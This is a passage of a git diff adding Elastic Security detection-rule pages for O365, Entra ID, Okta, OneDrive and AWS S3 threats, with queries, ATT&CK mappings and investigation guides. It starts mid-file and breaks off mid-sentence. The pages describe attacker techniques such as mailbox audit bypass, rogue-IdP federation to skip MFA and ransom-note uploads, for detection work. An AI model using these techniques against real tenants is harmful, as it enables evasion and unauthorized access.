+* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-excessive-single-sign-on-logon-errors.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-excessive-single-sign-on-logon-errors.asciidoc new file mode 100644 index 0000000000..2caf288469 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-excessive-single-sign-on-logon-errors.asciidoc @@ -0,0 +1,115 @@ +[[prebuilt-rule-8-19-8-o365-excessive-single-sign-on-logon-errors]] +=== O365 Excessive Single Sign-On Logon Errors + +Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token. + +*Rule type*: threshold + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Identity and Access Audit +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 211 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating O365 Excessive Single Sign-On Logon Errors* + + +Single Sign-On (SSO) in O365 streamlines user access by allowing one set of credentials for multiple applications. However, adversaries may exploit this by attempting brute force attacks to gain unauthorized access. The detection rule monitors for frequent SSO logon errors, signaling potential abuse, and helps identify compromised accounts by flagging unusual authentication patterns. + + +*Possible investigation steps* + + +- Review the specific account(s) associated with the excessive SSO logon errors by examining the event logs filtered by the query fields, particularly focusing on the o365.audit.LogonError field with the value "SsoArtifactInvalidOrExpired". +- Analyze the timestamps of the logon errors to determine if there is a pattern or specific time frame when the errors are occurring, which might indicate a targeted attack. +- Check for any recent changes or unusual activities in the affected account(s), such as password changes, unusual login locations, or device changes, to assess if the account might be compromised. +- Investigate the source IP addresses associated with the logon errors to identify if they are from known malicious sources or unusual locations for the user. +- Correlate the logon error events with other security alerts or logs from the same time period to identify any related suspicious activities or potential indicators of compromise. +- Contact the user(s) of the affected account(s) to verify if they experienced any issues with their account access or if they recognize the logon attempts, which can help determine if the activity is legitimate or malicious. + + +*False positive analysis* + + +- High volume of legitimate user logins: Users who frequently log in and out of multiple O365 applications may trigger excessive logon errors. To manage this, create exceptions for known high-activity accounts. +- Automated scripts or applications: Some automated processes may use outdated or incorrect credentials, leading to repeated logon errors. Identify and update these scripts to prevent false positives. +- Password changes: Users who recently changed their passwords might experience logon errors if they have not updated their credentials across all devices and applications. Encourage users to update their credentials promptly. +- Network issues: Temporary network disruptions can cause authentication errors. Monitor network stability and consider excluding errors during known network maintenance periods. +- Multi-factor authentication (MFA) misconfigurations: Incorrect MFA settings can lead to logon errors. Verify and correct MFA configurations for affected users to reduce false positives. + + +*Response and remediation* + + +- Immediately isolate the affected account by disabling it to prevent further unauthorized access attempts. +- Conduct a password reset for the compromised account and enforce a strong password policy to mitigate the risk of future brute force attacks. +- Review and analyze the account's recent activity logs to identify any unauthorized access or data exfiltration attempts. +- Implement multi-factor authentication (MFA) for the affected account and other high-risk accounts to add an additional layer of security. +- Notify the user of the affected account about the incident and provide guidance on recognizing phishing attempts and securing their credentials. +- Escalate the incident to the security operations team for further investigation and to determine if additional accounts or systems have been compromised. +- Update and enhance monitoring rules to detect similar patterns of excessive SSO logon errors, ensuring early detection of potential brute force attempts. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:"SsoArtifactInvalidOrExpired" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-mailbox-audit-logging-bypass.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-mailbox-audit-logging-bypass.asciidoc new file mode 100644 index 0000000000..87d9fe908e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-o365-mailbox-audit-logging-bypass.asciidoc @@ -0,0 +1,124 @@ +[[prebuilt-rule-8-19-8-o365-mailbox-audit-logging-bypass]] +=== O365 Mailbox Audit Logging Bypass + +Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://twitter.com/misconfig/status/1476144066807140355 + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Tactic: Initial Access +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating O365 Mailbox Audit Logging Bypass* + + +In Microsoft 365 environments, mailbox audit logging is crucial for tracking user activities like accessing or deleting emails. However, administrators can exempt certain accounts from logging to reduce noise, which attackers might exploit to hide their actions. The detection rule identifies successful attempts to create such exemptions, signaling potential misuse of this bypass mechanism. + + +*Possible investigation steps* + + +- Review the event logs for entries with event.dataset set to o365.audit and event.provider set to Exchange to confirm the presence of the Set-MailboxAuditBypassAssociation action. +- Identify the account associated with the event.action Set-MailboxAuditBypassAssociation and verify if it is a known and authorized account for creating audit bypass associations. +- Check the event.outcome field to ensure the action was successful and determine if there are any other related unsuccessful attempts that might indicate trial and error by an attacker. +- Investigate the history of the account involved in the bypass association to identify any unusual or suspicious activities, such as recent changes in permissions or unexpected login locations. +- Cross-reference the account with any known third-party tools or lawful monitoring accounts to determine if the bypass is legitimate or potentially malicious. +- Assess the risk and impact of the bypass by evaluating the types of activities that would no longer be logged for the account in question, considering the organization's security policies and compliance requirements. + + +*False positive analysis* + + +- Authorized third-party tools may generate a high volume of mailbox audit log entries, leading to bypass associations being set. Review and document these tools to ensure they are legitimate and necessary for business operations. +- Accounts used for lawful monitoring might be exempted from logging to reduce noise. Verify that these accounts are properly documented and that their activities align with organizational policies. +- Regularly review the list of accounts with bypass associations to ensure that only necessary and approved accounts are included. Remove any accounts that no longer require exemptions. +- Implement a process for periodically auditing bypass associations to detect any unauthorized changes or additions, ensuring that only intended accounts are exempted from logging. +- Consider setting up alerts for any new bypass associations to quickly identify and investigate potential misuse or unauthorized changes. + + +*Response and remediation* + + +- Immediately isolate the account associated with the successful Set-MailboxAuditBypassAssociation event to prevent further unauthorized actions. +- Review and revoke any unauthorized mailbox audit bypass associations to ensure all relevant activities are logged. +- Conduct a thorough audit of recent activities performed by the affected account to identify any suspicious or malicious actions that may have been concealed. +- Reset credentials for the compromised account and any other accounts that may have been affected to prevent further unauthorized access. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Implement additional monitoring for similar bypass attempts to enhance detection capabilities and prevent recurrence. +- Consider escalating the incident to a higher security tier or external cybersecurity experts if the scope of the breach is extensive or if internal resources are insufficient to handle the threat. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-oidc-discovery-url-changed-in-entra-id.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-oidc-discovery-url-changed-in-entra-id.asciidoc new file mode 100644 index 0000000000..cf0ba74a22 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-oidc-discovery-url-changed-in-entra-id.asciidoc @@ -0,0 +1,127 @@ +[[prebuilt-rule-8-19-8-oidc-discovery-url-changed-in-entra-id]] +=== OIDC Discovery URL Changed in Entra ID + +Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Authentication Methods Policy. This behavior may indicate an attempt to federate Entra ID with an attacker-controlled identity provider, enabling bypass of multi-factor authentication (MFA) and unauthorized access through bring-your-own IdP (BYOIDP) methods. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://dirkjanm.io/persisting-with-federated-credentials-entra-apps-managed-identities/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating OIDC Discovery URL Changed in Entra ID* + + +This rule detects when the OIDC `discoveryUrl` is changed within the Entra ID Authentication Methods policy. Adversaries may leverage this to federate Entra ID with a rogue Identity Provider (IdP) under their control, allowing them to authenticate users with attacker-owned credentials and bypass MFA. This misconfiguration allows an attacker to impersonate valid users by issuing tokens via a third-party OIDC IdP while still passing validation in Entra ID. This technique has been publicly demonstrated and has critical implications for trust in federated identity. + + +*Possible investigation steps* + +- Review `azure.auditlogs.properties.initiated_by.user.userPrincipalName` and `ipAddress` to identify who made the change and from where. +- Examine the `old_oidc_discovery` and `new_oidc_discovery` to confirm if the new `discoveryUrl` points to an unexpected or untrusted IdP. +- Check that the discovery URLs have `.well-known/openid-configuration` endpoints, which are standard for OIDC providers. +- Use `azure.auditlogs.properties.correlation_id` to pivot to related changes and activity from the same session. +- Review any subsequent sign-in activity that may have originated from the new IdP. +- Pivot to additional logs associated with the user or application that made the change to identify any further suspicious activity. + + +*False positive analysis* + +- Entra ID administrators may intentionally reconfigure OIDC trust relationships to support new business requirements. +- Validate any changes with the identity or security operations team before taking action. + + +*Response and remediation* + +- If the change is unauthorized, immediately revert the discovery URL to the trusted IdP via the Entra ID portal. +- Revoke tokens or sessions issued after the configuration change. +- Investigate how the unauthorized change occurred (e.g., compromised account or over-privileged app). +- Apply conditional access policies and change control procedures to protect IdP configuration changes. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.auditlogs-* metadata _id, _version, _index +| where event.action == "Authentication Methods Policy Update" +| eval Esql.azure_auditlogs_properties_target_resources_modified_properties_new_value_replace = replace(`azure.auditlogs.properties.target_resources.0.modified_properties.0.new_value`, "\\\\", "") +| eval Esql.azure_auditlogs_properties_target_resources_modified_properties_old_value_replace = replace(`azure.auditlogs.properties.target_resources.0.modified_properties.0.old_value`, "\\\\", "") +| dissect Esql.azure_auditlogs_properties_target_resources_modified_properties_new_value_replace "%{}discoveryUrl\":\"%{Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new}\"}%{}" +| dissect Esql.azure_auditlogs_properties_target_resources_modified_properties_old_value_replace "%{}discoveryUrl\":\"%{Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old}\"}%{}" +| where Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new is not null and Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old is not null +| where Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new != Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old +| keep + @timestamp, + event.action, + event.outcome, + azure.tenant_id, + azure.correlation_id, + azure.auditlogs.properties.activity_datetime, + azure.auditlogs.properties.operation_type, + azure.auditlogs.properties.initiated_by.user.userPrincipalName, + azure.auditlogs.properties.initiated_by.user.displayName, + azure.auditlogs.properties.initiated_by.user.ipAddress, + source.geo.city_name, + source.geo.region_name, + source.geo.country_name, + Esql.azure_auditlogs_properties_auth_oidc_discovery_url_new, + Esql.azure_auditlogs_properties_auth_oidc_discovery_url_old + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ +* Sub-technique: +** Name: Conditional Access Policies +** ID: T1556.009 +** Reference URL: https://attack.mitre.org/techniques/T1556/009/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-okta-user-sessions-started-from-different-geolocations.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-okta-user-sessions-started-from-different-geolocations.asciidoc new file mode 100644 index 0000000000..2e4473ee6b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-okta-user-sessions-started-from-different-geolocations.asciidoc @@ -0,0 +1,146 @@ +[[prebuilt-rule-8-19-8-okta-user-sessions-started-from-different-geolocations]] +=== Okta User Sessions Started from Different Geolocations + +Detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 15m + +*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://developer.okta.com/docs/reference/api/system-log/ +* https://developer.okta.com/docs/reference/api/event-types/ +* https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy +* https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection +* https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/ +* https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security +* https://www.elastic.co/security-labs/starter-guide-to-understanding-okta + +*Tags*: + +* Use Case: Identity and Access Audit +* Data Source: Okta +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 308 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Okta User Sessions Started from Different Geolocations* + + +This rule detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations. + + +*Possible investigation steps:* + +- Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.client.id` values can be used to pivot into the raw authentication events related to this alert. +- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields. +- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields. +- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field. + - Historical analysis should indicate if this device token hash is commonly associated with the user. +- Review the `okta.event_type` field to determine the type of authentication event that occurred. + - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons. + - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying. + - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API. +- Review the past activities of the actor(s) involved in this action by checking their previous actions. +- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity. + - This may help determine the authentication and authorization actions that occurred between the user, Okta and application. + + +*False positive analysis:* + +- It is very rare that a legitimate user would have multiple sessions started from different geo-located countries in a short time frame. + + +*Response and remediation:* + +- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required. +- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA). + - If MFA is already enabled, consider resetting MFA for the users. +- If any of the users are not legitimate, consider deactivating the user's account. +- Conduct a review of Okta policies and ensure they are in accordance with security best practices. +- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user. + - If so, confirm with the user this was a legitimate request. + - If so and this was not a legitimate request, consider deactivating the user's account temporarily. + - Reset passwords and reset MFA for the user. +- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule. + - This will prevent future occurrences of this event for this device from triggering the rule. + - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule. + - This should be done with caution as it may prevent legitimate alerts from being generated. + + +==== Setup + + +The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-okta* +| where + event.dataset == "okta.system" and + (event.action like "user.authentication.*" or event.action == "user.session.start") and + okta.security_context.is_proxy != true and + okta.actor.id != "unknown" and + event.outcome == "success" +| keep + event.action, + okta.security_context.is_proxy, + okta.actor.id, + okta.actor.alternate_id, + event.outcome, + client.geo.country_name +| stats + Esql.client_geo_country_name_count_distinct = count_distinct(client.geo.country_name) + by okta.actor.id, okta.actor.alternate_id +| where + Esql.client_geo_country_name_count_distinct >= 2 +| sort + Esql.client_geo_country_name_count_distinct desc + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-onedrive-malware-file-upload.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-onedrive-malware-file-upload.asciidoc new file mode 100644 index 0000000000..f3980a0c52 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-onedrive-malware-file-upload.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-19-8-onedrive-malware-file-upload]] +=== OneDrive Malware File Upload + +Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Tactic: Lateral Movement +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating OneDrive Malware File Upload* + + +OneDrive, a cloud storage service, facilitates file sharing and collaboration within organizations. However, adversaries can exploit this by uploading malware, which can spread across shared environments, leading to lateral movement within a network. The detection rule identifies such threats by monitoring OneDrive activities for malware detection events, focusing on file operations flagged by Microsoft's security engine. This proactive approach helps in identifying and mitigating potential breaches. + + +*Possible investigation steps* + + +- Review the alert details to confirm the event dataset is 'o365.audit' and the event provider is 'OneDrive' to ensure the alert is relevant to OneDrive activities. +- Examine the specific file operation flagged by the event code 'SharePointFileOperation' and action 'FileMalwareDetected' to identify the file in question and understand the nature of the detected malware. +- Identify the user account associated with the file upload to determine if the account has been compromised or if the user inadvertently uploaded the malicious file. +- Check the sharing settings of the affected file to assess the extent of exposure and identify any other users or systems that may have accessed the file. +- Investigate the file's origin and history within the organization to trace how it was introduced into the environment and whether it has been shared or accessed by other users. +- Review any additional security alerts or logs related to the user account or file to identify potential patterns of malicious activity or further compromise. +- Coordinate with IT and security teams to isolate the affected file and user account, and initiate remediation steps to prevent further spread of the malware. + + +*False positive analysis* + + +- Legitimate software updates or patches may be flagged as malware if they are not yet recognized by the security engine. Users should verify the source and integrity of the file and consider adding it to an exception list if confirmed safe. +- Files containing scripts or macros used for automation within the organization might trigger false positives. Review the file's purpose and origin, and whitelist it if it is a known and trusted internal tool. +- Shared files from trusted partners or vendors could be mistakenly identified as threats. Establish a process to verify these files with the sender and use exceptions for recurring, verified files. +- Archived or compressed files that contain known safe content might be flagged due to their format. Decompress and scan the contents separately to confirm their safety before adding exceptions. +- Files with unusual or encrypted content used for legitimate business purposes may be misclassified. Ensure these files are documented and approved by IT security before excluding them from alerts. + + +*Response and remediation* + + +- Immediately isolate the affected OneDrive account to prevent further file sharing and potential spread of malware within the organization. +- Notify the user associated with the account about the detected malware and instruct them to cease any file sharing activities until further notice. +- Conduct a thorough scan of the affected files using an updated antivirus or endpoint detection and response (EDR) solution to confirm the presence of malware and identify any additional infected files. +- Remove or quarantine the identified malicious files from OneDrive and any other locations they may have been shared to prevent further access or execution. +- Review and revoke any shared links or permissions associated with the infected files to ensure no unauthorized access is possible. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if any lateral movement or additional compromise has occurred. +- Implement enhanced monitoring and alerting for similar OneDrive activities to quickly detect and respond to any future malware uploads or related threats. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Taint Shared Content +** ID: T1080 +** Reference URL: https://attack.mitre.org/techniques/T1080/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ +* Sub-technique: +** Name: Upload Malware +** ID: T1608.001 +** Reference URL: https://attack.mitre.org/techniques/T1608/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc new file mode 100644 index 0000000000..5fe0b952f3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc @@ -0,0 +1,159 @@ +[[prebuilt-rule-8-19-8-potential-aws-s3-bucket-ransomware-note-uploaded]] +=== Potential AWS S3 Bucket Ransomware Note Uploaded + +Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the PutObject S3 API call with a common ransomware note file name or extension such as ransom or .lock. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://stratus-red-team.cloud/attack-techniques/AWS/aws.impact.s3-ransomware-batch-deletion/ +* https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/ + +*Tags*: + +* Domain: Cloud +* Data Source: AWS +* Data Source: Amazon Web Services +* Data Source: AWS S3 +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential AWS S3 Bucket Ransomware Note Uploaded* + + +This rule detects a successful `PutObject` to S3 where the object key matches common ransomware-note patterns (for example, `readme`, `how_to_decrypt`, `decrypt_instructions`, `ransom`, `lock`). Attackers who obtain credentials or abuse overly-permissive bucket policies can upload ransom notes (often after deleting or encrypting data). + + +*Possible Investigation Steps:* + +- **Confirm the actor and session details.** Review `aws.cloudtrail.user_identity.*` (ARN, type, access key, session context), `source.ip`, `user.agent`, and `tls.client.server_name` to identify *who* performed the upload and *from where*. Validate whether this principal typically writes to this bucket. +- **Inspect the object key and bucket context.** From `aws.cloudtrail.request_parameters`, capture the exact `key` and `bucketName`. Check whether the key is publicly readable (ACL), whether the bucket is internet-exposed, and whether replication or lifecycle rules could propagate or remove related objects. +- **Pivot to related S3 activity around the same time.** Look for `DeleteObject`/`DeleteObjects`, mass `PutObject` spikes, `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, and `PutBucketLifecycleConfiguration` events on the same bucket or by the same actor to determine if data destruction, policy tampering, or guard-rail changes occurred. +- **Assess blast radius across the account.** Search recent CloudTrail for the same actor/IP touching other buckets, KMS keys used by those buckets, and IAM changes (new access keys, policy attachments, role assumptions) that could indicate broader compromise paths consistent with ransomware playbooks. +- **Check protections and recovery posture on the bucket.** Verify whether S3 Versioning and (if in use) Object Lock legal hold are enabled; note prior versions available for the affected key, and whether lifecycle rules might expire them. +- **Correlate with threat signals.** Review other related alerts, GuardDuty S3-related findings, AWS Config drift on the bucket and its policy, and any SOAR/IR runbook executions tied to ransomware triage. + + +*False Positive Analysis:* + +- **Planned tests or red-team exercises.** Confirm change tickets or test windows for staging/dev buckets; red teams often drop “ransom-note-like” files during exercises. +- **Benign automation naming.** Some data-migration or backup tools may use “readme”/“recovery”-style filenames; validate by `user.agent`, principal, and target environment (dev vs prod). +- **Log/archive buckets.** Exclude infrastructure/logging buckets (for example, `AWSLogs`, CloudTrail, access logs) per rule guidance to reduce noise. + + +*Response and Remediation:* + + +**1. Immediate, low-risk actions (safe for most environments)** +- **Preserve context:** Export the triggering `PutObject` CloudTrail record(s), plus 15–30 min before/after, to an evidence bucket (restricted access). +- **Snapshot configuration:** Record current bucket settings (Block Public Access, Versioning, Object Lock, Bucket Policy, Lifecycle rules) and any KMS keys used. +- **Quiet the spread:** Pause destructive automation: disable/bypass lifecycle rules that would expire/delete object versions; temporarily pause data pipelines targeting the bucket. +- **Notify owners:** Inform the bucket/application owner(s) and security leadership. + +**2. Containment options (choose the least disruptive first)** +- **Harden exposure:** If not already enforced, enable `Block Public Access` for the bucket. +- **Targeted deny policy (temporary):** Add a restrictive bucket policy allowing only IR/admin roles while you scope impact. Reconfirm critical workload dependencies before applying. +- **Credential risk reduction:** If a specific IAM user/key or role is implicated, rotate access keys; for roles, remove risky policy attachments or temporarily restrict with an SCP/deny statement. + +**3. Evidence preservation** +- Export relevant CloudTrail events, S3 server/access logs (if enabled), AWS Config history for the bucket/policy, and the suspicious object plus its previous versions (if Versioning is enabled). +- Document actor ARN, source IPs, user agent(s), exact `bucketName`/`key`, and timestamps. Maintain a simple chain-of-custody note for collected artifacts. + +**4. Scope and hunting (same actor/time window)** +- Look for `DeleteObject(s)`, unusual `PutObject` volume, `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning` changes, `PutBucketLifecycleConfiguration`, and cross-account access. +- Cross reference other buckets touched by the same actor/IP; recent IAM changes (new keys, policy/role edits); GuardDuty findings tied to S3/credentials. + +**5. Recovery (prioritize data integrity)** +- If Versioning is enabled, restore last known-good versions for impacted objects. Consider applying 